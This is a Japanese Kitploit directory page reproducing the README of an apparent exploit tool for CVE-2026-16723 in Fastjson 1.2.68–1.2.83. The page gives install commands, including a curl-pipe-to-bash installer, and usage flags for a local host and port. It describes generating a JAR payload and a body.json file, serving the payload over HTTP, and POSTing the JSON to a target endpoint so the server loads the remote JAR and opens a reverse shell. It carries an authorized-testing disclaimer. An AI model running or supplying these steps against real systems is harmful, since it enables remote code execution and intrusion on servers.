Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-16723 — Fastjson バージョン 1.2.68 – 1.2.83 に影響する重大な脆弱性。 | Kitploit
ツール/GitHubGitHub/1xpwn/cve-2026-16723
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHub1xpwn/cve-2026-16723

CVE-2026-16723

Fastjson バージョン 1.2.68 – 1.2.83 に影響する重大な脆弱性。

リポジトリを見る
220日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-16723 エクスプロイト

CVE-2026-16723 用のスタンドアロンC++17実装です。これは Fastjson バージョン 1.2.68~1.2.83 に影響する深刻な脆弱性です。

必要条件

  • Linux(または Windows 上の WSL)

  • C++17 対応コンパイラ(GCC 7+ または Clang 5+)

  • CMake 3.10 以降

  • システムパッケージ:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

インストール

クイックインストール(推奨)

次の1コマンドですべてをインストールします:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

または手動でインストーラをダウンロードして実行します:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

インストールスクリプトは次のことを行います:

  • 必要なシステムパッケージをすべてインストールします。

  • 必要なヘッダオンリーライブラリをダウンロードします:

    • nlohmann/json
    • cpp-httplib
  • プロジェクトをビルドします。

  • コンパイルされたバイナリをカレントディレクトリに次の名前で配置します:

root@kitploit:~
./exploit

手動ビルド

リポジトリをクローンした場合:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

または手動でビルドします:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

使い方

バイナリを実行します:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

例

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

実行後、次のファイルが作成されます:

root@kitploit:~
x
body.json

HTTPサーバーは設定されたポート(デフォルト: 8000)で起動し、ツールはリバースシェル接続が来るのを待機します。


ペイロードの送信

生成された body.json ファイルを脆弱なエンドポイントに送信します:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

アプリケーションが別のJSONフィールドを期待する場合は、--field オプションで指定してください。


コマンドラインオプション


出力ファイル

FileDescription
x生成されたJARペイロード
body.jsonターゲットに送信するJSONペイロード

注意事項

  • このプロジェクトは認可されたセキュリティテストおよび教育目的のみを意図しています。
  • この実装は、ターゲットアプリケーションに jar:http および jar:file プロトコルを使用してリモートJARをダウンロードおよびロードさせます。
  • リバースシェルコマンドはエスケープの問題を減らすためにBase64でエンコードされています。

Twitter(X)でフォローしてください

  • MNM
ツールをダウンロード
OptionDescriptionDefault
--lhostローカルIPアドレス必須
--lportリバースシェル待受ポート4444
--http-portHTTPサーバーポート8000
--first試行する最初のファイルディスクリプタ3
--last試行する最後のファイルディスクリプタ30
--fieldJSONフィールド名facets
--outdir出力ディレクトリ.
-h, --helpヘルプメッセージを表示—